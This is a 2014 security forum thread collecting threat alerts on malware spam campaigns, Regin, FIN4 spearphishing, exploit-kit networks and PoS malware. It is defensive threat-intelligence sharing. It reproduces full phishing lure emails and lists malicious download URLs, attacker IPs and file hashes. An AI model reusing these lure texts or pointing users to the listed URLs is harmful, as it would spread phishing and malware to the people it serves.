Nov 24, 2014 - "... high-risk Android app detected as ANDROIDOS_STIP.A in Chile. This app, found distributed through forums and blogs, can be used to hack into the user’s RFID bus transit card to recharge the credits... Paying via RFID cards is becoming more popular nowadays as more mobile devices add NFC support. Banks, merchants or public services issue RFID cards to their customers with prepaid credits... Using widely available tools, the attacker cracked the card’s authentication key. With the cracked key and the native NFC support in Android and the device, cloning a card and adding credits can be easily implemented in a mobile app... These particular MIFARE models were discontinued years ago and supplemented with more secure models. However, it appears that card issuers have opted for cheaper solutions which put their customers at risk...
> http://blog.trendmicro.com/trendlabs-security-intelligence/good-nfc-habits/
We recommend customers take steps to protect RFID cards in their possession. They should also periodically check the balances of their accounts as well. In addition, if possible, they should check if any cards they are currently using are vulnerable and report these to their providers. RFID/NFC attacks are a well-known risk..."
> http://blog.trendmicro.com/trendlabs-security-intelligence/safe-nfc-for-businesses/
___

Fake MyFax SPAM - poorly-detected malware
- http://blog.dynamoo.com/2014/11/myfax-message-from-unknown-spam-leads.html
24 Nov 2014 - "Fax spam again... This spam appears to come from the person receiving it (which is an old trick).
From: victim@ victimdomain .com
Sent: 24 November 2014 15:31
To: norep.c@ mefax .com
Subject: MyFax message from "unknown" - 3 page(s)
Fax Message [Caller-ID: 1-407-067-7356]
http ://159593 .webhosting58 .1blu .de/messages/get_message.php
You have received a 3 page fax at Mon, 24 Nov 2014 15:31:23 +0000.
* The reference number for this fax is chd_did11-14186364797-10847113200-628.
View this fax using your PDF reader.
Thank you for using the MyFax service!

The link in the message downloads a file faxmessage_7241_pdf61.zip which in turn contains a malicious executable faxmessage_7241_pdf.exe which has a VirusTotal detection rate of 4/53*... connects to the following URLs:
http ://95.211.199.37 :16792/2411us3/HOME/0/51-SP3/0/
http ://95.211.199.37 :16792/2411us3/HOME/1/0/0/
http ://lasuruguayas .com/images/refus3.pnk
A file EXE1.EXE is also dropped, with a VirusTotal detection rate of just 1/54**..."
* https://www.virustotal.com/en/file/bb34a977009276411c1eafa8a60d553c8ea847d32cc6071710eff6b743269e91/analysis/1416846678/

** https://www.virustotal.com/en/file/78eeb34989ac134081e005e076a46675cd0d2b4da552b4e6fe7e388489cde550/analysis/1416846980/

95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/

199.26.87.212: https://www.virustotal.com/en/ip-address/199.26.87.212/information/
___

Regin: spy tool
- http://www.symantec.com/connect/blogs/regin-top-tier-espionage-tool-enables-stealthy-surveillance
Updated: 24 Nov 2014 - "... A back door-type Trojan, Regin is a complex piece of malware whose structure displays a degree of technical competence rarely seen. Customizable with an extensive range of capabilities depending on the target, it provides its controllers with a powerful framework for mass surveillance and has been used in spying operations against government organizations, infrastructure operators, businesses, researchers, and private individuals...
Regin’s five stages:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig1-architecture.png
... Almost half of all infections targeted private individuals and small businesses. Attacks on telecoms companies appear to be designed to gain access to calls being routed through their infrastructure.
Confirmed Regin infections by sector:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig2-sectors.png
The discovery of Regin highlights how significant investments continue to be made into the development of tools for use in intelligence gathering. Symantec believes that many components of Regin remain undiscovered and additional functionality and versions may exist..."
> http://www.symantec.com/security_response/writeup.jsp?docid=2013-121221-3645-99

- http://community.websense.com/blogs/securitylabs/archive/2014/11/24/what-protection-can-be-offered-from-sophisticated-malware-such-as-regin.aspx
24 Nov 2014
___

Avast AV can't handle Windows fixes ??
- http://www.theregister.co.uk/2014/11/24/you_stupid_brick_pcs_running_avast_av_cant_handle_windows_fixes/
24 Nov 2014 - "Security software outfit Avast are trying to figure out why the combination of recent Windows patches and updates to the latter company's software are breaking PCs. Hordes of users have found that their PCs, especially those running Windows 8 and 8.1, grind to a halt after they apply both Microsoft's recent KB3000850 update rollup and Avast's latest automatic updates. Some users report their PCs won't boot, or take forever to apply patches... Avast forums*... Microsoft's not immune either: a Redmond thread titled Major issues with KB3000850 includes plenty of people wondering why the company issued an update incompatible with third-party software**. That criticism may not be entirely fair, as an Avast staffer has posted the following explanation for the mess:
'We have been able to simulate the problem in our lab and I think we fixed this issue. This Windows updates calls new memory related functions which are not fully compatible with Avast' ... Whatever the cause, a fair few people are rather upset with both Avast and Microsoft, with the latter company most often felt to be in the wrong..."
* https://forum.avast.com/index.php?topic=160717.0

** http://answers.microsoft.com/en-us/windows/forum/windows8_1-windows_update/major-issues-with-kb3000850/5cb4cddd-52da-44af-9fd5-3ae1a72b0b1a
___

FTC Obtains Court Orders Temporarily Shutting Down Massive Tech Support Scams
FTC, State of Florida Charge Companies Bilked $120 Million from Consumers for Bogus Software and Tech Support Service
- http://www.ftc.gov/news-events/press-releases/2014/11/ftc-obtains-court-orders-temporarily-shutting-down-massive-tech
Nov 19, 2014 - "At the request of the Federal Trade Commission and the State of Florida, a federal court has temporarily shut down two massive telemarketing operations that conned tens of thousands of consumers out of more than $120 million by deceptively marketing computer software and tech support services. The orders also temporarily freeze the defendants’ assets and place the businesses under the control of a court-appointed receiver. According to complaints filed by the FTC, since at least 2012, the defendants have used software designed to trick consumers into thinking there are problems with their computers, then subjected those consumers to high-pressure deceptive sales pitches for tech support products and services to fix their non-existent computer problems... In this latest action, the FTC and the State of Florida have filed two separate cases against companies who allegedly sold the -bogus- software and the deceptive telemarketing operators who allegedly sold -needless- tech support services:
- In the first case, the defendants selling software include PC Cleaner Inc.; Netcom3 Global Inc.; Netcom3 Inc., also doing business as Netcom3 Software Inc.; and Cashier Myricks, Jr. The telemarketing defendants include Inbound Call Experts LLC; Advanced Tech Supportco. LLC; PC Vitalware LLC; Super PC Support LLC; Robert D. Deignan, Paul M. Herdsman, and Justin M. Wright.
- In the second case, the defendants selling software include Boost Software Inc. and Amit Mehta, and the telemarketing defendants include Vast Tech Support LLC, also doing business as OMG Tech Help, OMG Total Protection, OMG Back Up, downloadsoftware.com, and softwaresupport.com; OMG Tech Help LLC; Success Capital LLC; Jon Paul Holdings LLC; Elliot Loewenstern; Jon-Paul Vasta; and Mark Donahue.
According to the FTC’s complaints, each scam starts with computer software that purports to enhance the security or performance of consumers’ computers. Typically, consumers download a free trial version of software that runs a computer system scan. The defendants’ software scan always identifies numerous errors on consumers’ computers, regardless of whether the computer has any performance problems..."

:fear::fear:

AplusWebMaster
2014-11-25, 16:29
FYI...

What the heck is with 104.152.215.0/25?
- http://blog.dynamoo.com/2014/11/what-heck-is-with-104152215025.html
25 Nov 2014 - "A contact gave me the heads up to an exploit-kit running on 104.152.215.90* [virustotal] which appears to be using MS16-064** among other things . 104.152.215.90 belongs to Query Foundry LLC in Wyoming, however they suballocated it to a customer... The random structure of most of the domains is an indicator of possible maliciousness. The few domains that don't meet these pattern seem to be .fr domains which look like they have been hijacked or re-registered.. and oddly they are all registered to different (often obviously fake) people at the same address in France... not much data about the range, there are a couple of domains that are also flagged a malicious:
sxzav .xyz [Google diagnostics]: [url]http://www.google.com/safebrowsing/diagnostic?site=sxzav.xyz
klioz .xyz [Google diagnostics]: http://www.google.com/safebrowsing/diagnostic?site=klioz.xyz
... there is enough evidence to treat 104.152.215.0/25 as a suspect network. It does not appear to have any legitimate sites, the sites that do exist are of an unknown purpose and often have apparently fake WHOIS details for the domains. Blocking or monitoring for traffic to and from that /25 is the easiest way of doing it..."
* https://www.virustotal.com/en/ip-address/104.152.215.90/information/

** https://technet.microsoft.com/en-us/library/security/ms14-064.aspx

*** http://urlquery.net/report.php?id=1416802220951
___

Fake 'my photo' SPAM - new trojan variant
- http://blog.mxlab.eu/2014/11/25/latest-my-photo-email-contains-new-trojan-variant/
Nov 25, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “my photo”.
This email is sent from a spoofed address and has the following body:

my new photo :)

The attached file my_iphone_photo.zip contains the folder with the 54 kB large file 1my_photo.exe and the 30 kB large file 2my_photo.jpg. The trojan is known as a variant of MSIL/Injector.GMB, UDS:DangerousObject.Multi.Generic, Trojan.MSIL.BVXGen or Win32.Trojan.Inject.Auto. At the time of writing, 4 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/28993a2effd007e5d6c5453f61268c37c94c8d666156d0ebcae2e4dca004dcff/analysis/1416912927/

:fear: :mad:

AplusWebMaster
2014-11-27, 05:17
FYI...

QuickBooks Payment Overdue Spam
- http://threattrack.tumblr.com/post/103653348923/quickbooks-payment-overdue-spam
Nov 26, 2014 - "Subjects Seen:
Payment Overdue
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 07/22/2014 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Lucio Gee
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.

Malicious File Name and MD5:
Invoice_[-var=partorderb].zip (A3374A3639D4F8EBF105B8FFA1ACB4D1)
Invoice_0128648.scr (08AEA8B75143DC788A52568E823DD10E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1856c0ee3c8aea258ec44e55795007bc/tumblr_inline_nfnt72zuuJ1r6pupn.png

Tagged: QuickBooks, Upatre

:fear::fear:

AplusWebMaster
2014-11-27, 15:35
FYI...

Fake HMRC SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/hmrc-taxes-application-reference-68j9-wdwk-1nmj-p0za-received-fake-pdf-malware/
27 Nov 2014 - "'HMRC taxes application with reference 68J9 WDWK 1NMJ P0ZA received' pretending to come from noreply@ taxreg.hmrc .gov.uk with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The application with reference number 68J9 WDWK 1NMJ P0ZA submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.

27 November 2014: HM Revenue & Customs – TAX.zip: Extracts to: HM Revenue & Customs – TAX.scr
Current Virus total detections: 2/56* ( same malware as THIS**). This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/580df36f77762a526dced5127ae216a057314bea0b80e92e239db41f8a4f46b0/analysis/1417085413/
... Behavioural information
TCP connections
95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/
83.125.22.167: https://www.virustotal.com/en/ip-address/83.125.22.167/information/

** http://myonlinesecurity.co.uk/info-santanderbillpayment-co-uk-fake-pdf-malware/
___

Tainted network: Crissic Solutions (167.160.160.0/19)
- http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
27 Nov 2014 - "Several IPs hosted on the Crissic Solutions range of 167.160.160.0/19 (suballocated from QuadraNet) have been hosting exploit kits in the past few days, leading to Cryptolocker and other nastiness. I analysed over 1500 sites hosted in the Crissic IP address range... and many sites were already marked as being -malicious- by Google, and some other sites obviously follow the same naming pattern and must be considered as malicious... Given the concentration of active malicious servers in 167.160.165.0/24 and 167.160.166.0/24 then I would recommend -blocking- your traffic to those ranges at least temporarily, despite there being legitimate sites in that range. You might choose to block the entire /19 of course, I will leave you to look at the evidence..."
More detail at the dynamoo URL above.)

:fear: :mad:

AplusWebMaster
2014-11-28, 14:47
FYI...

Black Friday: deal or no deal
- https://blog.malwarebytes.org/online-security/2014/11/black-friday-deal-or-no-deal/
Nov 27, 2014 - "... Spammers and scammers have risen to the occasion with deals that are too good to be true such as in this example for -fake- Gucci products. This was reported in a Tweet by Denis Sinegubko, from Unmask Parasites*
* http://www.unmaskparasites.com/ -- https://twitter.com/unmaskparasites
'Denis @unmaskparasites - Chinese spammers are ready for Black Friday. Found these domains in code on a hacked site: GucciBlackFridays .com, BlackFridayCDN .com'
... and also a security researcher at Sucuri** -- http://sucuri.net/ -- http://blog.sucuri.net/2014/11
The site boasts incredible prices on normally very expensive merchandise... Shoppers might get fooled by the security badges and stamps, which of course are only here for show... Traffic to these -bogus- sites will come from spam or, as in this case, from compromised websites... This code resides on the compromised server and performs different checks, in particular whether the user visiting the page is real or a search engine... When Black Friday is over, the crooks will be ready to serve you special deals for Cyber Monday... There certainly are good deals to be made during this holiday season but you really ought to be careful what you click on. You might order counterfeit goods or have your banking credentials stolen and money depleted..."
(More detail at the malwarebytes URL above.)

- https://blog.malwarebytes.org/online-security/2014/11/black-friday-and-cyber-monday-online-shopping-made-safer/
Nov 24, 2014

- http://www.trendmicro.com/vinfo/us/security/news/mobile-safety/a-guide-to-avoiding-cyber-monday-scams-on-mobile
Nov 24, 2014

- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/staying-safe-from-online-threats-this-thanksgiving
Nov 21, 2014
___

Lots of Black Friday SPAM & Phishing
- https://isc.sans.edu/diary.html?storyid=19003
2014-11-28 23:20:46 UTC - "Likely every reader out there, their friends and family, even their pets with email accounts, have received Black Friday SPAM or phishing attempts today. Our own Dr. J sent the handlers an Amazon sample for 'One Click Black Friday Rewards'.
Of course, that one click goes -nowhere- near Amazon and directs you to the likes of Black Fiday (yes, it's misspelled) at hXXp ://www.jasbuyersnet .com/cadillac/umbered/sedatest/styes/coleuses/unterrified.htm. Can't speak to the payload there, don't bother, just use it at as ammo for heightened awareness and safe shopping on line during these holidays, and...well, all the time. Be careful out there. :-)
Cheers and happy holidays."
___

Best Buy Order Spam
- http://threattrack.tumblr.com/post/103809164928/best-buy-order-spam
Nov 28, 2014 - "Subjects Seen:
Details of Your Order From Best Buy
Typical e-mail details:
E-shop Best Buy has received an order addressed to you which has to be confirmed by the recipient within 4 days.
Upon confirmation you may pick it in any nearest store of Best Buy.
Detailed order information is attached to the letter.
Wishing you Happy Thanksgiving!
Best Buy

Malicious File Name and MD5:
BestBuy_Order.exe (bff17aecb3cc9b0281275f801026b75d)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d119ffd996422b655f2ff200a50953b/tumblr_inline_nfrayxzYyG1r6pupn.jpg

Tagged: Best Buy, Kuluoz

:fear::fear: :mad:

AplusWebMaster
2014-12-01, 21:33
FYI...

Dridex Phish uses malicious word docs
- https://isc.sans.edu/diary.html?storyid=19011
2014-12-01 - "... During the past few months, Botnet-based campaigns have sent waves of phishing emails associated with Dridex... The emails contained malicious Word documents, and with macros enabled, these documents -infected- Windows computers with Dridex malware. Various people have posted about Dridex [1] [2], and some sites like Dynamoo's blog and TechHelpList... often report on these and other phishing campaigns... On 11 Nov 2014, I saw at least 60 emails with 'Duplicate Payment Received' in the subject line. This appeared to be a botnet-based campaign from compromised hosts at various locations across the globe... Monitoring the infection traffic on Security Onion, we found alerts for Dridex traffic from the EmergingThreats signature set (ET TROJAN Dridex POST Checkin) [3]... File hashes changed during this wave of emails, indicating at least 3 different Word documents were used. During this phishing run, Dridex malware came from IP addresses in the 62.76.185.0/24 block..."
1] http://stopmalvertising.com/malware-reports/analysis-of-dridex-cridex-feodo-bugat.html

2] http://www.abuse.ch/?p=8332

3] https://isc.sans.edu/diaryimages/images/brad5.png

4] http://doc.emergingthreats.net/2019478

62.76.185.127: https://www.virustotal.com/en/ip-address/62.76.185.127/information/
___

Fake 'New offer Job' SPAM - PDF malware
- http://myonlinesecurity.co.uk/new-offer-job-fake-pdf-malware/
1 Dec 2014 - "'New offer Job' with a zip attachment pretending to come from Job service <billiond8@ greatest3threeisland .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
New offer for you, see attached here.

There is also a version around with the subject of 'Tiket alert' pretending to come from FBR service <newspaperedixv@ greatest3threeisland .com>
Look at the attached file for more information.
Assistant Vice President, FBR service
Management Corporation

Both emails contain the same malware as does today’s version of 'my new photo malware'*
1 December 2014 : tiket.zip: Extracts to: tiket.exe
Current Virus total detections: 5/19** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/new-photo-malware/

** https://www.virustotal.com/en/file/3baa6154cae386bd89d4fce302adad6b5085cac01bcbe03c4fc709ee5173f07e/analysis/1417475226/
___

Phishing scam that hit Wall Street might work against you
- http://arstechnica.com/security/2014/12/phishing-scam-that-penetrated-wall-street-just-might-work-against-you-too/
Dec 1 2014 - "Researchers have uncovered a group of Wall Street-savvy hacks that have penetrated the e-mail accounts of more than 100 companies, a feat that has allowed them to obtain highly valuable plans concerning corporate acquisitions and other insider information.
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/outlook-phish-640x359.jpg
FIN4, as the group is known, relies on a set of extremely simple tactics that in many cases has allowed them to remain undetected since at least the middle of 2013, according to a report published Monday from security firm FireEye*. Members boast a strong command of the English language and knowledge of corporate finance and Fortune 500 culture. They use that savvy to send highly targeted spearphishing e-mails that harvest login credentials for Microsoft Outlook accounts. The group then uses compromised accounts of one employee, customer, or partner to send spearphishing e-mails to other company insiders. At times, the attackers will -inject- a malicious message into an ongoing e-mail discussion among multiple people, furthering their chances of success. E-mails are sent from the accounts of people the target knows, and they discuss mergers, acquisitions, or other topics already in progress. The attackers often bcc other recipients to make it more difficult to detect the malicious e-mail. The messages appear to be written by native English speakers and often contain previously exchanged Microsoft Office documents that embed hidden malicious macros. This results in fraudulent e-mails that are extremely hard to detect, even by some people who have been trained to spot such phishing campaigns... FireEye researchers said FIN4 members have compromised the accounts of C-level executives, legal counsel, regulatory and compliance personnel, scientists, and advisors of more than 100 companies. About 80 of them are publicly traded companies, while the remaining 20 are Wall Street firms that advise corporations on legal or securities matters or possible or pending mergers and acquisitions. As a result, the group stood to make a windfall if it used the insider information to buy or sell stocks before the information became widely known... Embedded in the previously stolen documents are Visual Basic Applications (VBA) macros that prompt readers to enter the Outlook user names and passwords. The scripts then funnel the credentials to servers controlled by the attackers. In other, earlier cases, the spearphishing e-mails contained links to fake Outlook Web App login pages that prompted visitors to enter their passwords. Some of the attacks FireEye observed targeted multiple parties inside law firms, consultancies, and corporations as they discussed particular pending business deals. In one instance, attackers used previously acquired access to e-mail accounts at an advisory firm to harvest information being exchanged about an acquisition under consideration involving one of its clients... the best thing any potential target can do is to educate employees how to spot phishing attacks. The FIN4 attackers have just raised the bar, so chances are most education programs should be revised to help employees spot these new and improved tactics."
* https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html

- http://www.reuters.com/video/2014/12/02/cyber-spies-steal-corporate-secrets-to-r?videoId=347691634
Dec 01, 2014
Video: 02:09

- http://www.computerworld.com/article/2853697/fireeye-suspects-fin4-hackers-are-americans-after-insider-info-to-game-stock-market.html
Dec 1, 2014
> http://core0.staticworld.net/images/article/2014/12/fin4-targets-100533260-large.idge.jpg

- http://www.theregister.co.uk/2014/12/02/malware_raids_stock_markets/
2 Dec 2014
> http://regmedia.co.uk/2014/12/02/11223.png
___

Europol and US customs seize 292 domains selling counterfeit goods
- http://www.theinquirer.net/inquirer/news/2384329/europol-and-us-customs-seize-292-domains-selling-counterfeit-goods
Dec 1, 2014 - "... Interpol in conjunction with US Immigration and Customs Enforcement has seized the domains of almost 300 websites that were selling counterfeit merchandise. The law enforcement agencies, not to mention politicians, are concerned that citizens are being taken for mugs online and cannot resist spending good money on fake rubbish... Europol said that the seizures involved 25 law enforcement agencies from 19 countries and participation from the US National Intellectual Property Rights Coordination Center... The websites offered a mix of content, ranging from luxury goods and sportswear to CDs and DVDs. The domains are now in the hands of the national governments involved in the shutdowns, and the gear is presumably facing some sort of immolation. Operation In Our Sites has closed down 1,829 domains so far..."
___

O/S Market Share - Nov 2014
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0

Browser Market Share - Nov 2014
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
___

PoS Malware 'd4re|dev1|' attacking Ticket Machines and Electronic Kiosks
- https://www.intelcrawler.com/news-24
Nov 26, 2014 - "... new type of Point-of-Sale malware called “d4re|dev1|”. This new strain of malware, which is hitting Mass Transit Systems, acts as an advanced backdoor with remote administration, having RAM scrapping and keylogging features. This new POS malware find adds to a growing list of POS variants being developed by underground cyber criminals because of the high ROI when they hit payloads like a Target or Home Depot. Variants recently identified and profiled by IntelCrawler include POSCLOUD, Nemanja, JackPOS, BlackPOS, and Decebal. The exploitation of merchants is taking place on a global scale as outlined by the IntelCrawler POS infection map*.
* https://www.intelcrawler.com/analytics/pmim
... The malware has a “File Upload” option, which can be used for remote payload updating. The process of malware was masked under “PGTerm.exe” or “hkcmd.exe”, as well as legitimate names of software such as Google Chrome. Adversaries use this option for the installation of additional backdoors and tools, which allows them to avoid infrastructure limitations and security policies designed for detection. This broad lateral approach shows that serious cybercriminals are not interested in just one particular Point-of-Sale terminal – they are looking for enterprise wide network environments, having tens of connected devices accepting payments and returning larger sets of spoils to their C2 servers... As this POS malware market is evolving, new security measures are needed to combat the seemingly continuous strains being developed by the underground. In addition to consulting your PCI vendor, IntelCrawler strongly recommends to encapsulate any administration channels to the -VPN- as well as to limit the software environment for operators, using proper access control lists and updated security polices..."

:fear: :mad:

AplusWebMaster
2014-12-02, 14:43
FYI...

Fake Walmart 'Order Details' SPAM opens malware site
- http://www.hoax-slayer.com/walmart-order-details-malware.shtml
Dec 2, 2014 - "Email purporting to be from Walmart claims that you can click a link to read more information about a recent order. The email is a scam... Clicking the link opens a website that contains malware. This attack is very similar to another malware campaign in which -bogus- emails claim to be from Costco*...
> http://www.hoax-slayer.com/images/walmart-order-details-malware-1.jpg
This email, which claims to be from retail giant Walmart, advises that your order is ready to be picked up at any local store. It invites you to -click-a-link- to find out more information about the supposed order... the email is -not- from Walmart and has nothing to do with any order you have made. The goal of the email is simply to trick you into clicking the link. If you receive this email, you may be concerned that fraudulent purchases have been made in your name and click the link in the hope of finding out more details... the link opens a compromised website that harbours malware. In some versions, the malicious download may start automatically. In other cases, a notice on the website may instruct you to download a file to view the order information. Generally, the download will be a .zip file that contains a .exe file inside. Clicking the .exe file will install the malware on your computer. The exact malware payload delivered in such attacks may vary... This attack closely mirrors another current malware campaign that uses emails that falsely claim to be from Costco*. Again, the email claims that you can get information about recent purchase by clicking a link. Clicking downloads a .zip file that contains malware."
* http://www.hoax-slayer.com/costco-order-notification-malware.shtml
Nov 28, 2014
> http://www.hoax-slayer.com/images/costco-order-notification-malware-2.jpg
___

Fake 'FEDEX TRACK' 'FEDEX INFO' SPAM - contains trojan
- http://blog.mxlab.eu/2014/12/02/fake-emails-from-fedex-track-or-fedex-info-contains-trojan/
Dec 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
- Ezekiel Francis your agent FEDEX
- Bullock, Tiger P. agent FEDEX
- Quin Greer FEDEX company
This email is sent from the -spoofed- address “FEDEX TRACK <******@ care .it>”, FEDEX INFO <fedexservice@ care .info> or “FEDEX INFO <fedextechsupport@ care .org>” and has the following body:
Dear Customer!
We attempted to deliver your package on December 2th, 2014, 10:50 AM.
The delivery attempt failed because the address was business closed or nobody could sign for it.
To pick up the package,please, print the invoice that is attached to this email and visit Fedex location indicated in the receipt.
If the package is not picked up within 48 hours, it will be returned to the shipper.
Label/Receipt Number: 45675665665
Expected Delivery Date: December 2th, 2014
Class: International Package Service
Service(s): Delivery Confirmation
Status: Notification sent
Thank you ...

The attached file Package.zip contains the 180 kB large file 45675665665.scr... At the time of writing, 3 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/3848d21eddfb5d70a39406bf45652f6daed3432cbd61bef50e705350904ebd3b/analysis/
___

Iran hacks target airlines, energy, defense companies
- http://www.reuters.com/article/2014/12/02/us-cybersecurity-iran-idUSKCN0JG18I20141202
Dec 2, 2014 - "Iranian hackers have infiltrated major airlines, energy companies, and defense firms around the globe over the past two years in a campaign that could eventually cause physical damage, according to U.S. cyber security firm Cylance*. The report comes as governments scramble to better understand the extent of Iran's cyber capabilities, which researchers say have grown rapidly as Tehran seeks to retaliate for Western cyber attacks on its nuclear program... The California-based company said its researchers uncovered breaches affecting more than 50 entities in 16 countries, and had evidence they were committed by the same Tehran-based group that was behind a previously reported 2013 cyber attack on a U.S. Navy network. It did not identify the companies targeted, but said they included major aerospace firms, airports and airlines, universities, energy firms, hospitals, and telecommunications operators based in the United States, Israel, China, Saudi Arabia, India, Germany, France, England and others. Cylance said it had evidence the hackers were Iranian, and added the scope and sophistication of the attacks suggested they had state backing... Cylance Chief Executive Stuart McClure said the Iranian hacking group has so far focused its campaign - dubbed Operation Cleaver - on intelligence gathering, but that it likely has the ability to launch attacks. He said researchers who succeeded in gaining access to some of the hackers' infrastructure found massive databases of user credentials and passwords from organizations including energy, transportation, and aerospace companies, as well as universities. He said they also found diagrams of energy plants, screen shots demonstrating control of the security system for a major Middle Eastern energy company, and encryption keys for a major Asian airline... Cylance said its researchers also obtained hundreds of files apparently stolen by the Iranian group from the U.S. Navy's Marine Corps Intranet (NMCI). U.S. government sources had confirmed that Iran was behind the 2013 NMCI breach..."
* http://blog.cylance.com/operation-cleaver-prevention-is-everything
Dec 2, 2014
- http://www.cylance.com/operation-cleaver/?&__hssc=&__hstc&hsCtaTracking=d1078200-8921-49f2-ab9c-6f87b7a0c3ee|25e0e347-ef8e-475e-9c59-4b051299b3ea
___

Fake 'Voice Message from Message Admin' SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/01/fake-emails-voice-message-0174669888-from-message-admin-leads-to-malware/
Dec 1, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Voice Message #0174669888″ (number will vary). This email is sent from the -spoofed- address 'Message Admin <NoRepse@ voiceservice .com>” and has the following body:

Voice redirected message
hxxp ://www.studio37kriswhite .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 19:06:35 +0000

Voice redirected message
hxp ://thepinkcompany .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 20:10:47 +0000

The embedded URL leads to a web page with a Javascript that is making use of an ActiveXObject to download the file voice646-872-8712_wav.zip. Once extracted, the 43 kB large file voice646-872-8712_wav.exe is present. The trojan is known as W32.HfsAutoA.631F, Trojan.DownLoader11.46947, UDS:DangerousObject.Multi.Generic , Upatre.FE or BehavesLike.Win32.Backdoor.pz.
The trojan is capable of starting a listening server, make HTTP requests, can fingerprint a system and have outbound communication. A service bowmc.exe will be installed, the TCP port 1034 will be opened and connection with the IP on port 21410 and 21397 will be openened for outbound traffic. At the time of writing, 8 of the 55* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8e3b9d3e0c04be729180a959c167ac3330fb4d3506e6ab5375a1876f2b1f6cca/analysis/1417468098/
... Behavioural information
TCP connections
192.186.219.137: https://www.virustotal.com/en/ip-address/192.186.219.137/information/
UDP communications
91.200.16.56: https://www.virustotal.com/en/ip-address/91.200.16.56/information/
91.200.16.37: https://www.virustotal.com/en/ip-address/91.200.16.37/information/

:mad: :fear::fear:

AplusWebMaster
2014-12-03, 16:45
FYI...

More malware on Crissic Solutions LLC
- http://blog.dynamoo.com/2014/12/more-malware-on-crissic-solutions-llc.html
3 Dec 2014 - "Another bunch of IPs on Crissic Solutions LLC, leading to what appears to be the Angler EK (see this URLquery report*):
167.160.164.102: https://www.virustotal.com/en/ip-address/167.160.164.102/information/
167.160.164.103: https://www.virustotal.com/en/ip-address/167.160.164.103/information/
167.160.164.141: https://www.virustotal.com/en/ip-address/167.160.164.141/information/
167.160.164.142: https://www.virustotal.com/en/ip-address/167.160.164.142/information/
... domains are being exploited (although there will probably be more soon)... Subdomains in use start with one of qwe. or asd. or zxc... Crissic Solutions LLC operates 167.160.160.0/19 which does have some legitimate sites in it, but since I have previously recommended** blocking 167.160.165.0/24 and 167.160.166.0/24 and now with -multiple- servers on 167.160.164.0/24 also compromised then I suspect that temporarily blocking the entire /19 is the way to go."
* http://urlquery.net/report.php?id=1417554412643

** http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
___

Fake 'Fedex Unable to deliver your item' SPAM - malware
- http://myonlinesecurity.co.uk/fedex-unable-deliver-item-00486182-malware/
3 Dec 2014 - "'FedEx Unable to deliver your item, #00486182' pretending to come from FedEx International Economy with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
FedEx ®
Dear Customer,
We could not deliver your parcel.
Please, open email attachment to print shipment label.
Regards,
Francis Huber,
Delivery Agent.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.

3 December 2014: Label_00486182.zip: Extracts to: Label_00486182.doc.js
Current Virus total detections: 4/55* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8e78a7c9ae488585a690dc8b5f3b6ebafaf8451ec93462810bd632e51e228fd3/analysis/1417611902/
___

Be Wary of ‘Order Confirmation’ Emails
- http://krebsonsecurity.com/2014/12/be-wary-of-order-confirmation-emails/
Dec 3, 2014 - "If you receive an email this holiday season asking you to “confirm” an online e-commerce order or package shipment, please resist the urge to -click- the included -link- or attachment: Malware purveyors and spammers are blasting these missives by the millions each day in a bid to trick people into giving up control over their computers and identities.
'Order confirmation' malware email blasted out by the Asprox spam botnet:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/hd-asprox-600x273.png
